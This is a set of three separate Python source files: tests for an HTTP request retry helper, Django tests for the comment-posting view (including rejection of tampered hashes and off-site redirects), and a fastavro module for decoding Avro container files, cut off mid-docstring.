            'owner_id': '1234',
            'timestamp': 5,
            'attempts': 0,
            'intervals': [10],
            'request': {
                'url': "%s/foo" % (srv.url,),
                'method': 'POST',
                'headers': {
                    'X-Foo': ['a', 'b'],
                    'X-Bar': ['c', 'd'],
                }
            }
        }, persistent=False)
        self.assertEqual(headers, [{
            'X-Foo': ['a', 'b'],
            'X-Bar': ['c', 'd'],
        }])
    @inlineCallbacks
    def test_retry_inc_attempts(self):
        # Each retry() call mutates the request, bumping 'attempts'.
        srv = yield ToyServer.from_test(self)
        @srv.app.route('/foo')
        def route(_):
            pass
        req = {
            'owner_id': '1234',
            'timestamp': 5,
            'attempts': 0,
            'intervals': [10, 20, 30],
            'request': {
                'url': "%s/foo" % (srv.url,),
                'method': 'GET'
            }
        }
        yield retry(req, persistent=False)
        self.assertEqual(req['attempts'], 1)
        yield retry(req, persistent=False)
        self.assertEqual(req['attempts'], 2)
        yield retry(req, persistent=False)
        self.assertEqual(req['attempts'], 3)
    @inlineCallbacks
    def test_retry_unicode(self):
        # Unicode method/body/header values must survive the round trip.
        srv = yield ToyServer.from_test(self)
        reqs = []
        @srv.app.route('/')
        def route(req):
            reqs.append({
                'method': req.method,
                'body': req.content.read(),
                'headers': {
                    'X-Bar': req.requestHeaders.getRawHeaders('X-Bar'),
                }
            })
        yield retry({
            'owner_id': '1234',
            'timestamp': 5,
            'attempts': 0,
            'intervals': [10, 20, 30],
            'request': {
                'url': u"%s" % (srv.url,),
                'method': u'POST',
                'body': u'foo',
                'headers': {u'X-Bar': [u'baz', u'quux']}
            }
        }, persistent=False)
        [req] = reqs
        self.assertEqual(req, {
            'method': 'POST',
            'body': 'foo',
            'headers': {'X-Bar': ['baz', 'quux']}
        })
    @inlineCallbacks
    def test_retry_failed(self):
        # Only 5xx responses count as failures worth retrying.
        srv = yield ToyServer.from_test(self)
        @srv.app.route('/<int:code>')
        def route(req, code):
            req.setResponseCode(code)
        def send(code):
            return treq.get("%s/%s" % (srv.url, code), persistent=False)
        self.assertFalse(retry_failed((yield send(200))))
        self.assertFalse(retry_failed((yield send(201))))
        self.assertFalse(retry_failed((yield send(400))))
        self.assertFalse(retry_failed((yield send(404))))
        self.assertTrue(retry_failed((yield send(500))))
        self.assertTrue(retry_failed((yield send(504))))
        self.assertTrue(retry_failed((yield send(599))))
    def test_can_reattempt(self):
        # A request can be reattempted while attempts < len(intervals).
        req = {
            'owner_id': '1234',
            'timestamp': 5,
            'attempts': 0,
            'intervals': [10, 20, 30],
            'request': {
                'url': "/foo",
                'method': 'GET'
            }
        }
        self.assertTrue(can_reattempt(req))
        req['attempts'] = 1
        self.assertTrue(can_reattempt(req))
        req['attempts'] = 2
        self.assertTrue(can_reattempt(req))
        req['attempts'] = 3
        self.assertFalse(can_reattempt(req))
| |
from __future__ import absolute_import, unicode_literals
import re
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.comments import signals
from django.contrib.comments.models import Comment
from . import CommentTestCase
from ..models import Article, Book
# Matches the post-comment redirect, e.g. http://testserver/posted/?c=123,
# capturing the new comment's pk.
post_redirect_re = re.compile(r'^http://testserver/posted/\?c=(?P<pk>\d+$)')
class CommentViewTests(CommentTestCase):
    """Tests for the comment posting view mounted at /post/.

    Relies on CommentTestCase fixtures: Article pk=1, Book pk='12.34',
    and the users 'normaluser' etc.  getValidData() builds a valid POST
    payload (including the security hash) for a target object.
    """
    def testPostCommentHTTPMethods(self):
        # The view only accepts POST.
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        response = self.client.get("/post/", data)
        self.assertEqual(response.status_code, 405)
        self.assertEqual(response["Allow"], "POST")
    def testPostCommentMissingCtype(self):
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        del data["content_type"]
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)
    def testPostCommentBadCtype(self):
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["content_type"] = "Nobody expects the Spanish Inquisition!"
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)
    def testPostCommentMissingObjectPK(self):
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        del data["object_pk"]
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)
    def testPostCommentBadObjectPK(self):
        # pk 14 presumably does not exist in the fixtures.
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["object_pk"] = "14"
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)
    def testPostInvalidIntegerPK(self):
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["comment"] = "This is another comment"
        data["object_pk"] = '\ufffd'
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)
    def testPostInvalidDecimalPK(self):
        b = Book.objects.get(pk='12.34')
        data = self.getValidData(b)
        data["comment"] = "This is another comment"
        data["object_pk"] = 'cookies'
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)
    def testCommentPreview(self):
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["preview"] = "Preview"
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, "comments/preview.html")
    def testHashTampering(self):
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["security_hash"] = "Nobody expects the Spanish Inquisition!"
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)
    def testDebugCommentErrors(self):
        """The debug error template should be shown only if DEBUG is True"""
        olddebug = settings.DEBUG
        settings.DEBUG = True
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["security_hash"] = "Nobody expects the Spanish Inquisition!"
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)
        self.assertTemplateUsed(response, "comments/400-debug.html")
        settings.DEBUG = False
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)
        self.assertTemplateNotUsed(response, "comments/400-debug.html")
        settings.DEBUG = olddebug
    def testCreateValidComment(self):
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        self.response = self.client.post("/post/", data, REMOTE_ADDR="1.2.3.4")
        self.assertEqual(self.response.status_code, 302)
        self.assertEqual(Comment.objects.count(), 1)
        c = Comment.objects.all()[0]
        self.assertEqual(c.ip_address, "1.2.3.4")
        self.assertEqual(c.comment, "This is my comment")
    def testPostAsAuthenticatedUser(self):
        # Name/email come from the logged-in user when left blank.
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data['name'] = data['email'] = ''
        self.client.login(username="normaluser", password="normaluser")
        self.response = self.client.post("/post/", data, REMOTE_ADDR="1.2.3.4")
        self.assertEqual(self.response.status_code, 302)
        self.assertEqual(Comment.objects.count(), 1)
        c = Comment.objects.all()[0]
        self.assertEqual(c.ip_address, "1.2.3.4")
        u = User.objects.get(username='normaluser')
        self.assertEqual(c.user, u)
        self.assertEqual(c.user_name, u.get_full_name())
        self.assertEqual(c.user_email, u.email)
    def testPostAsAuthenticatedUserWithoutFullname(self):
        """
        Check that the user's name in the comment is populated for
        authenticated users without first_name and last_name.
        """
        user = User.objects.create_user(username='jane_other',
                email='jane@example.com', password='jane_other')
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data['name'] = data['email'] = ''
        self.client.login(username="jane_other", password="jane_other")
        self.response = self.client.post("/post/", data, REMOTE_ADDR="1.2.3.4")
        c = Comment.objects.get(user=user)
        self.assertEqual(c.ip_address, "1.2.3.4")
        self.assertEqual(c.user_name, 'jane_other')
        user.delete()
    def testPreventDuplicateComments(self):
        """Prevent posting the exact same comment twice"""
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        self.client.post("/post/", data)
        self.client.post("/post/", data)
        self.assertEqual(Comment.objects.count(), 1)
        # This should not trigger the duplicate prevention
        self.client.post("/post/", dict(data, comment="My second comment."))
        self.assertEqual(Comment.objects.count(), 2)
    def testCommentSignals(self):
        """Test signals emitted by the comment posting view"""
        # callback
        def receive(sender, **kwargs):
            self.assertEqual(kwargs['comment'].comment, "This is my comment")
            self.assertTrue('request' in kwargs)
            received_signals.append(kwargs.get('signal'))
        # Connect signals and keep track of handled ones
        received_signals = []
        expected_signals = [
            signals.comment_will_be_posted, signals.comment_was_posted
        ]
        for signal in expected_signals:
            signal.connect(receive)
        # Post a comment and check the signals
        self.testCreateValidComment()
        self.assertEqual(received_signals, expected_signals)
        for signal in expected_signals:
            signal.disconnect(receive)
    def testWillBePostedSignal(self):
        """
        Test that the comment_will_be_posted signal can prevent the comment from
        actually getting saved
        """
        def receive(sender, **kwargs): return False
        signals.comment_will_be_posted.connect(receive, dispatch_uid="comment-test")
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        response = self.client.post("/post/", data)
        self.assertEqual(response.status_code, 400)
        self.assertEqual(Comment.objects.count(), 0)
        signals.comment_will_be_posted.disconnect(dispatch_uid="comment-test")
    def testWillBePostedSignalModifyComment(self):
        """
        Test that the comment_will_be_posted signal can modify a comment before
        it gets posted
        """
        def receive(sender, **kwargs):
            # a bad but effective spam filter :)...
            kwargs['comment'].is_public = False
        signals.comment_will_be_posted.connect(receive)
        self.testCreateValidComment()
        c = Comment.objects.all()[0]
        self.assertFalse(c.is_public)
    def testCommentNext(self):
        """Test the different "next" actions the comment view can take"""
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        response = self.client.post("/post/", data)
        location = response["Location"]
        match = post_redirect_re.match(location)
        self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
        data["next"] = "/somewhere/else/"
        data["comment"] = "This is another comment"
        response = self.client.post("/post/", data)
        location = response["Location"]
        match = re.search(r"^http://testserver/somewhere/else/\?c=\d+$", location)
        self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
        # An off-site "next" must fall back to the default redirect.
        data["next"] = "http://badserver/somewhere/else/"
        data["comment"] = "This is another comment with an unsafe next url"
        response = self.client.post("/post/", data)
        location = response["Location"]
        match = post_redirect_re.match(location)
        self.assertTrue(match != None, "Unsafe redirection to: %s" % location)
    def testCommentDoneView(self):
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        response = self.client.post("/post/", data)
        location = response["Location"]
        match = post_redirect_re.match(location)
        self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
        pk = int(match.group('pk'))
        response = self.client.get(location)
        self.assertTemplateUsed(response, "comments/posted.html")
        self.assertEqual(response.context[0]["comment"], Comment.objects.get(pk=pk))
    def testCommentNextWithQueryString(self):
        """
        The `next` key needs to handle already having a query string (#10585)
        """
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["next"] = "/somewhere/else/?foo=bar"
        data["comment"] = "This is another comment"
        response = self.client.post("/post/", data)
        location = response["Location"]
        match = re.search(r"^http://testserver/somewhere/else/\?foo=bar&c=\d+$", location)
        self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
    def testCommentPostRedirectWithInvalidIntegerPK(self):
        """
        Tests that attempting to retrieve the location specified in the
        post redirect, after adding some invalid data to the expected
        querystring it ends with, doesn't cause a server error.
        """
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["comment"] = "This is another comment"
        response = self.client.post("/post/", data)
        location = response["Location"]
        broken_location = location + "\ufffd"
        response = self.client.get(broken_location)
        self.assertEqual(response.status_code, 200)
    def testCommentNextWithQueryStringAndAnchor(self):
        """
        The `next` key needs to handle already having an anchor. Refs #13411.
        """
        # With a query string also.
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["next"] = "/somewhere/else/?foo=bar#baz"
        data["comment"] = "This is another comment"
        response = self.client.post("/post/", data)
        location = response["Location"]
        match = re.search(r"^http://testserver/somewhere/else/\?foo=bar&c=\d+#baz$", location)
        self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
        # Without a query string
        a = Article.objects.get(pk=1)
        data = self.getValidData(a)
        data["next"] = "/somewhere/else/#baz"
        data["comment"] = "This is another comment"
        response = self.client.post("/post/", data)
        location = response["Location"]
        match = re.search(r"^http://testserver/somewhere/else/\?c=\d+#baz$", location)
        self.assertTrue(match != None, "Unexpected redirect location: %s" % location)
| |
# cython: auto_cpdef=True
"""Python code for reading AVRO files"""
# This code is a modified version of the code at
# http://svn.apache.org/viewvc/avro/trunk/lang/py/src/avro/ which is under
# Apache 2.0 license (http://www.apache.org/licenses/LICENSE-2.0)
import json
from struct import unpack, error as StructError
from zlib import decompress
import datetime
from decimal import localcontext, Decimal
from uuid import UUID
try:
from fastavro._six import MemoryIO, xrange, btou, utob, iteritems,\
is_str, str2ints, fstint
from fastavro._schema import (
extract_record_type, acquaint_schema, populate_schema_defs,
extract_logical_type
)
except ImportError:
from fastavro.six import MemoryIO, xrange, btou, utob, iteritems, \
is_str, str2ints, fstint
from fastavro.schema import (
extract_record_type, acquaint_schema, populate_schema_defs,
extract_logical_type
)
from fastavro.const import MCS_PER_HOUR, MCS_PER_MINUTE, MCS_PER_SECOND, \
MLS_PER_HOUR, MLS_PER_MINUTE, MLS_PER_SECOND
# Container-file format version byte.
VERSION = 1
# Every Avro object container file starts with these 4 bytes ('Obj' + version).
MAGIC = b'Obj' + utob(chr(VERSION))
# Number of bytes in the per-block sync marker.
SYNC_SIZE = 16
# Schema used to decode an Avro container file's own header block.
HEADER_SCHEMA = {
    'type': 'record',
    'name': 'org.apache.avro.file.Header',
    'fields': [
        {
            'name': 'magic',
            'type': {'type': 'fixed', 'name': 'magic', 'size': len(MAGIC)},
        },
        {
            'name': 'meta',
            'type': {'type': 'map', 'values': 'bytes'}
        },
        {
            'name': 'sync',
            'type': {'type': 'fixed', 'name': 'sync', 'size': SYNC_SIZE}
        },
    ]
}
# Mask for the low 8 bits of a value.
MASK = 0xFF
# All schema type names recognized by the Avro specification.
AVRO_TYPES = set([
    'boolean',
    'bytes',
    'double',
    'float',
    'int',
    'long',
    'null',
    'string',
    'fixed',
    'enum',
    'record',
    'error',
    'array',
    'map',
    'union',
    'request',
    'error_union'
])
class SchemaResolutionError(Exception):
    """Raised when a writer schema cannot be resolved against a reader schema."""
    pass
def match_types(writer_type, reader_type):
    """Return True when ``reader_type`` can accept ``writer_type``.

    Unions (lists) always match here -- branch checking happens later.
    Identical types match, as do the Avro numeric promotions
    int->long/float/double, long->float/double, float->double.
    """
    if isinstance(writer_type, list) or isinstance(reader_type, list):
        return True
    if writer_type == reader_type:
        return True
    # Numeric promotion table: writer type -> allowed wider reader types.
    promotions = {
        'int': ('long', 'float', 'double'),
        'long': ('float', 'double'),
        'float': ('double',),
    }
    return reader_type in promotions.get(writer_type, ())
def match_schemas(w_schema, r_schema):
    """Check that a writer schema is compatible with a reader schema.

    Returns True when compatible; raises SchemaResolutionError otherwise.
    """
    error_msg = 'Schema mismatch: %s is not %s' % (w_schema, r_schema)
    if isinstance(w_schema, list):
        # Writer union: the concrete branch is validated in read_union
        # once it is known.
        return True
    if isinstance(r_schema, list):
        # Reader union: at least one branch must accept the writer schema.
        if any(match_types(w_schema, candidate) for candidate in r_schema):
            return True
        raise SchemaResolutionError(error_msg)
    # Primitive schemas are plain strings; complex schemas are dicts
    # carrying their type under the 'type' key.
    w_type = w_schema['type'] if isinstance(w_schema, dict) else w_schema
    r_type = r_schema['type'] if isinstance(r_schema, dict) else r_schema
    if w_type == r_type == 'map':
        if match_types(w_schema['values'], r_schema['values']):
            return True
    elif w_type == r_type == 'array':
        if match_types(w_schema['items'], r_schema['items']):
            return True
    elif match_types(w_type, r_type):
        return True
    raise SchemaResolutionError(error_msg)
def read_null(fo, writer_schema=None, reader_schema=None):
    """null occupies zero bytes; nothing is read from the stream."""
    return None
def read_boolean(fo, writer_schema=None, reader_schema=None):
    """A boolean is a single byte: 0 is false, anything else is true.

    The spec writes 0x00/0x01, but many languages treat any non-zero
    byte as true, so be liberal on input.
    """
    (value,) = unpack('B', fo.read(1))
    return value != 0
def parse_timestamp(data, resolution):
    """Convert ``data`` ticks at ``resolution`` ticks-per-second to a datetime.

    NOTE(review): fromtimestamp returns a *naive* datetime in the local
    timezone -- confirm callers expect local rather than UTC time.
    """
    return datetime.datetime.fromtimestamp(data / resolution)
def read_timestamp_millis(data, writer_schema=None, reader_schema=None):
    """Decode a timestamp-millis logical value via parse_timestamp."""
    ticks_per_second = float(MLS_PER_SECOND)
    return parse_timestamp(data, ticks_per_second)
def read_timestamp_micros(data, writer_schema=None, reader_schema=None):
    """Decode a timestamp-micros logical value via parse_timestamp."""
    ticks_per_second = float(MCS_PER_SECOND)
    return parse_timestamp(data, ticks_per_second)
def read_date(data, writer_schema=None, reader_schema=None):
    """Decode an Avro ``date`` logical value into a datetime.date.

    The Avro spec defines ``date`` as the number of days since the Unix
    epoch (1970-01-01).  The previous ``date.fromordinal(data)`` counted
    days from 0001-01-01 instead, so every decoded date was shifted by
    the proleptic-Gregorian epoch offset.
    """
    return datetime.date(1970, 1, 1) + datetime.timedelta(days=data)
def read_uuid(data, writer_schema=None, reader_schema=None):
    """Build a uuid.UUID from its canonical hex-string representation."""
    return UUID(hex=data)
def read_time_millis(data, writer_schema=None, reader_schema=None):
    """Decode a time-millis logical value into a datetime.time.

    ``data`` is presumed to be milliseconds since midnight (per the Avro
    spec for time-millis).
    """
    h = int(data / MLS_PER_HOUR)
    m = int(data / MLS_PER_MINUTE) % 60
    s = int(data / MLS_PER_SECOND) % 60
    # datetime.time takes microseconds, hence the * 1000
    mls = int(data % MLS_PER_SECOND) * 1000
    return datetime.time(h, m, s, mls)
def read_time_micros(data, writer_schema=None, reader_schema=None):
    """Decode a time-micros logical value into a datetime.time.

    ``data`` is presumed to be microseconds since midnight (per the Avro
    spec for time-micros); no unit conversion is needed for the
    microsecond component.
    """
    h = int(data / MCS_PER_HOUR)
    m = int(data / MCS_PER_MINUTE) % 60
    s = int(data / MCS_PER_SECOND) % 60
    mcs = data % MCS_PER_SECOND
    return datetime.time(h, m, s, mcs)
def read_bytes_decimal(data, writer_schema=None, reader_schema=None):
    """
    Decimal is encoded as fixed. Fixed instances are encoded using the
    number of bytes declared in the schema.
    based on https://github.com/apache/avro/pull/82/

    The bytes hold a big-endian two's-complement unscaled integer; the
    result is Decimal(unscaled) * 10**-scale at the schema's precision.
    """
    scale = writer_schema['scale']
    precision = writer_schema['precision']
    size = len(data)
    datum_byte = str2ints(data)
    unscaled_datum = 0
    # The top bit of the first byte is the two's-complement sign bit.
    msb = fstint(data)
    leftmost_bit = (msb >> 7) & 1
    if leftmost_bit == 1:
        # Negative: clear the sign bit, accumulate the magnitude
        # big-endian, then subtract 2**(bits-1) to restore the sign.
        modified_first_byte = datum_byte[0] ^ (1 << 7)
        datum_byte = [modified_first_byte] + datum_byte[1:]
        for offset in xrange(size):
            unscaled_datum <<= 8
            unscaled_datum += datum_byte[offset]
        unscaled_datum += pow(-2, (size * 8) - 1)
    else:
        # Non-negative: plain big-endian accumulation.
        for offset in xrange(size):
            unscaled_datum <<= 8
            unscaled_datum += (datum_byte[offset])
    with localcontext() as ctx:
        # Apply the schema-declared precision while shifting in the scale.
        ctx.prec = precision
        scaled_datum = Decimal(unscaled_datum).scaleb(-scale)
    return scaled_datum
def read_long(fo, writer_schema=None, reader_schema=None):
    """int and long values are written using variable-length, zig-zag
    coding.

    Raises StopIteration on a clean EOF: most readers start each datum
    here, so EOF at the first byte ends the iteration.
    """
    first = fo.read(1)
    if not first:
        raise StopIteration
    byte = ord(first)
    accum = byte & 0x7F
    shift = 7
    # Continuation bit (0x80) set means another 7 payload bits follow.
    while byte & 0x80:
        byte = ord(fo.read(1))
        accum |= (byte & 0x7F) << shift
        shift += 7
    # Undo the zig-zag encoding: even -> n/2, odd -> -(n+1)/2.
    return (accum >> 1) ^ -(accum & 1)
def read_float(fo, writer_schema=None, reader_schema=None):
    """Decode a 4-byte little-endian IEEE-754 float.

    The on-wire layout is equivalent to Java's floatToIntBits written in
    little-endian byte order.
    """
    raw = fo.read(4)
    (value,) = unpack('<f', raw)
    return value
def read_double(fo, writer_schema=None, reader_schema=None):
    """Decode an 8-byte little-endian IEEE-754 double.

    The on-wire layout is equivalent to Java's doubleToLongBits written in
    little-endian byte order.
    """
    raw = fo.read(8)
    (value,) = unpack('<d', raw)
    return value
def read_bytes(fo, writer_schema=None, reader_schema=None):
    """Decode Avro bytes: a long length prefix followed by the raw bytes."""
    nbytes = read_long(fo)
    return fo.read(nbytes)
def read_utf8(fo, writer_schema=None, reader_schema=None):
    """Decode an Avro string: length-prefixed UTF-8 character data."""
    raw = read_bytes(fo)
    return btou(raw, 'utf-8')
def read_fixed(fo, writer_schema, reader_schema=None):
    """Decode a fixed: exactly ``writer_schema['size']`` bytes, no prefix."""
    nbytes = writer_schema['size']
    return fo.read(nbytes)
def read_enum(fo, writer_schema, reader_schema=None):
    """Decode an enum: an int giving the zero-based symbol position.

    Raises SchemaResolutionError when the decoded symbol does not exist in
    the reader schema's symbol list.
    """
    index = read_long(fo)
    symbol = writer_schema['symbols'][index]
    if reader_schema and symbol not in reader_schema['symbols']:
        symlist = reader_schema['symbols']
        raise SchemaResolutionError(
            '%s not found in reader symbol list %s' % (symbol, symlist))
    return symbol
def read_array(fo, writer_schema, reader_schema=None):
    """Decode an array written as a series of blocks.

    Each block is a long count followed by that many items; a zero count
    ends the array.  A negative count means abs(count) items and is
    followed by a long byte size for the block, which we skip.
    """
    if reader_schema:
        def decode_item(stream, w_schema, r_schema):
            return read_data(stream, w_schema['items'], r_schema['items'])
    else:
        def decode_item(stream, w_schema, _):
            return read_data(stream, w_schema['items'])
    items = []
    count = read_long(fo)
    while count != 0:
        if count < 0:
            count = -count
            # Block byte size: useful only for skipping, discard it here.
            read_long(fo)
        for _ in xrange(count):
            items.append(decode_item(fo, writer_schema, reader_schema))
        count = read_long(fo)
    return items
def read_map(fo, writer_schema, reader_schema=None):
    """Decode a map written as a series of blocks.

    Each block is a long count followed by that many key/value pairs; a
    zero count ends the map.  A negative count means abs(count) pairs and
    is followed by a long byte size for the block, which we skip.
    """
    if reader_schema:
        def decode_value(stream, w_schema, r_schema):
            return read_data(stream, w_schema['values'], r_schema['values'])
    else:
        def decode_value(stream, w_schema, _):
            return read_data(stream, w_schema['values'])
    mapping = {}
    count = read_long(fo)
    while count != 0:
        if count < 0:
            count = -count
            # Block byte size: useful only for skipping, discard it here.
            read_long(fo)
        for _ in xrange(count):
            key = read_utf8(fo)
            mapping[key] = decode_value(fo, writer_schema, reader_schema)
        count = read_long(fo)
    return mapping
def read_union(fo, writer_schema, reader_schema=None):
    """Decode a union: a long branch index, then a value of that branch.

    With a reader schema, resolves the writer's chosen branch against the
    reader's candidates and raises SchemaResolutionError on mismatch.
    """
    index = read_long(fo)
    chosen = writer_schema[index]
    if not reader_schema:
        return read_data(fo, chosen)
    # Handle case where the reader schema is just a single type (not union)
    if not isinstance(reader_schema, list):
        if match_types(chosen, reader_schema):
            return read_data(fo, chosen, reader_schema)
    else:
        for candidate in reader_schema:
            if match_types(chosen, candidate):
                return read_data(fo, chosen, candidate)
    raise SchemaResolutionError(
        'schema mismatch: %s not found in %s' % (writer_schema, reader_schema))
def read_record(fo, writer_schema, reader_schema=None):
    """A record is encoded by encoding the values of its fields in the order
    that they are declared. In other words, a record is encoded as just the
    concatenation of the encodings of its fields. Field values are encoded per
    their schema.

    Schema Resolution:
    * the ordering of fields may be different: fields are matched by name.
    * schemas for fields with the same name in both records are resolved
      recursively.
    * if the writer's record contains a field with a name not present in the
      reader's record, the writer's value for that field is ignored.
    * if the reader's record schema has a field that contains a default value,
      and writer's schema does not have a field with the same name, then the
      reader should use the default value from its field.
    * if the reader's record schema has a field with no default value, and
      writer's schema does not have a field with the same name, then the
      field's value is unset.
    """
    record = {}
    if reader_schema is None:
        # No resolution needed: decode every writer field in declared order.
        for field in writer_schema['fields']:
            record[field['name']] = read_data(fo, field['type'])
    else:
        # Index reader fields by name so writer-order decoding can match them.
        readers_field_dict = \
            dict((f['name'], f) for f in reader_schema['fields'])
        for field in writer_schema['fields']:
            readers_field = readers_field_dict.get(field['name'])
            if readers_field:
                record[field['name']] = read_data(fo,
                                                  field['type'],
                                                  readers_field['type'])
            else:
                # Field not in the reader schema: decode and discard.
                # should implement skip
                read_data(fo, field['type'], field['type'])
        # fill in default values
        if len(readers_field_dict) > len(record):
            writer_fields = [f['name'] for f in writer_schema['fields']]
            for field_name, field in iteritems(readers_field_dict):
                if field_name not in writer_fields:
                    default = field.get('default')
                    # The membership test (not the .get above) distinguishes
                    # a missing default from an explicit default of None.
                    if 'default' in field:
                        record[field['name']] = default
                    else:
                        msg = 'No default value for %s' % field['name']
                        raise SchemaResolutionError(msg)
    return record
# Post-processors for logical types, keyed by '<avro type>-<logicalType>'
# (the format produced by extract_logical_type).  Applied by read_data
# after the underlying primitive value has been decoded.
LOGICAL_READERS = {
    'long-timestamp-millis': read_timestamp_millis,
    'long-timestamp-micros': read_timestamp_micros,
    'int-date': read_date,
    'bytes-decimal': read_bytes_decimal,
    'string-uuid': read_uuid,
    'int-time-millis': read_time_millis,
    'long-time-micros': read_time_micros,
}
# Dispatch table mapping Avro type names to decoder functions.  Note that
# 'int' shares read_long (both use zig-zag varints) and the record/error/
# request and union/error_union pairs share decoders.
READERS = {
    'null': read_null,
    'boolean': read_boolean,
    'string': read_utf8,
    'int': read_long,
    'long': read_long,
    'float': read_float,
    'double': read_double,
    'bytes': read_bytes,
    'fixed': read_fixed,
    'enum': read_enum,
    'array': read_array,
    'map': read_map,
    'union': read_union,
    'error_union': read_union,
    'record': read_record,
    'error': read_record,
    'request': read_record,
}
def read_data(fo, writer_schema, reader_schema=None):
    """Read a single datum from file object *fo* according to schema.

    Dispatches on the writer schema's type, optionally resolves it against
    *reader_schema*, and applies any logical-type post-processing.
    """
    record_type = extract_record_type(writer_schema)
    logical_type = extract_logical_type(writer_schema)
    if reader_schema and record_type in AVRO_TYPES:
        match_schemas(writer_schema, reader_schema)
    try:
        data = READERS[record_type](fo, writer_schema, reader_schema)
        # NOTE(review): when writer_schema is a plain type-name string this
        # membership test is a substring search; it happens to be False for
        # all primitive names, but a dict check would be more explicit.
        if 'logicalType' in writer_schema:
            fn = LOGICAL_READERS[logical_type]
            return fn(data, writer_schema, reader_schema)
        return data
    except StructError:
        # A short read inside struct.unpack means the stream ended
        # mid-value; surface it as EOF.
        raise EOFError('cannot read %s from %s' % (record_type, fo))
def skip_sync(fo, sync_marker):
    """Consume the expected sync marker, raising ValueError on mismatch."""
    actual = fo.read(SYNC_SIZE)
    if actual != sync_marker:
        raise ValueError('expected sync marker not found')
def null_read_block(fo):
    """Read a block in the "null" codec: data is stored uncompressed.

    The block's byte-length prefix is consumed and discarded; the caller
    keeps reading records straight from *fo*.
    """
    read_long(fo, None)
    return fo
def deflate_read_block(fo):
    """Read a block in the "deflate" codec into an in-memory stream."""
    compressed = read_bytes(fo, None)
    # wbits=-15: negative window size selects a "raw" deflate stream with
    # no zlib header/trailer.  See zlib.h.
    return MemoryIO(decompress(compressed, -15))
# Codec name -> block decompressor.  Optional codecs (e.g. snappy) are
# registered below only when their library is importable.
BLOCK_READERS = {
    'null': null_read_block,
    'deflate': deflate_read_block
}
# Optional snappy codec support: registered only if python-snappy installs.
try:
    import snappy

    def snappy_read_block(fo):
        # An avro snappy block is a length-prefixed payload whose last
        # 4 bytes are a CRC32 of the uncompressed data.
        length = read_long(fo, None)
        data = fo.read(length - 4)
        fo.read(4)  # CRC of the uncompressed block; not verified here
        return MemoryIO(snappy.decompress(data))

    BLOCK_READERS['snappy'] = snappy_read_block
except ImportError:
    pass
def _iter_avro(fo, header, codec, writer_schema, reader_schema):
    """Yield avro records from *fo* block by block until end of file.

    *codec* selects the block decompressor; the sync marker from *header*
    delimits blocks.  Raises ValueError for an unknown codec.
    """
    # Value in the header schema is bytes.
    sync_marker = header['sync']
    read_block = BLOCK_READERS.get(codec)
    if not read_block:
        raise ValueError('Unrecognized codec: %r' % codec)
    while True:
        try:
            # read_long signals end of stream by raising StopIteration.
            block_count = read_long(fo, None)
        except StopIteration:
            # Return explicitly: letting StopIteration escape a generator
            # becomes a RuntimeError under PEP 479 (Python 3.7+).
            return
        block_fo = read_block(fo)
        for _ in xrange(block_count):
            yield read_data(block_fo, writer_schema, reader_schema)
        skip_sync(fo, sync_marker)
class iter_avro:
    """Iterator over records in an avro container file."""
    def __init__(self, fo, reader_schema=None):
        """Creates a new iterator

        Parameters
        ----------
        fo: file like
            Input stream
        reader_schema: dict, optional
            Reader schema

        Example
        -------
        >>> with open('some-file.avro', 'rb') as fo:
        >>>     avro = iter_avro(fo)
        >>>     schema = avro.schema
        >>>     for record in avro:
        >>>         process_record(record)
        """
        self.fo = fo
        try:
            # The container header is itself an avro record.
            self._header = read_data(fo, HEADER_SCHEMA)
        except StopIteration:
            raise ValueError('cannot read header - is it an avro file?')
        # `meta` values are bytes. So, the actual decoding has to be external.
        self.metadata = \
            dict((k, btou(v)) for k, v in iteritems(self._header['meta']))
        self.schema = self.writer_schema = \
            json.loads(self.metadata['avro.schema'])
        self.codec = self.metadata.get('avro.codec', 'null')
        self.reader_schema = reader_schema
        # Register named sub-schemas so read_data can resolve references.
        acquaint_schema(self.writer_schema, READERS)
        if reader_schema:
            populate_schema_defs(reader_schema)
        self._records = _iter_avro(fo,
                                   self._header,
                                   self.codec,
                                   self.writer_schema,
                                   reader_schema)
    def __iter__(self):
        return self._records
    def next(self):
        # Python 2 spelling; aliased to __next__ below for Python 3.
        return next(self._records)
    __next__ = next
def schemaless_reader(fo, schema):
    """Read a single record written using schemaless_writer.

    Parameters
    ----------
    fo: file-like
        Input stream
    schema: dict
        Reader schema (must match the schema the record was written with)
    """
    # Register any named sub-schemas before decoding.
    acquaint_schema(schema, READERS)
    return read_data(fo, schema)
def is_avro(path_or_buffer):
    """Return True if the path (or readable buffer) starts with the Avro
    magic bytes.

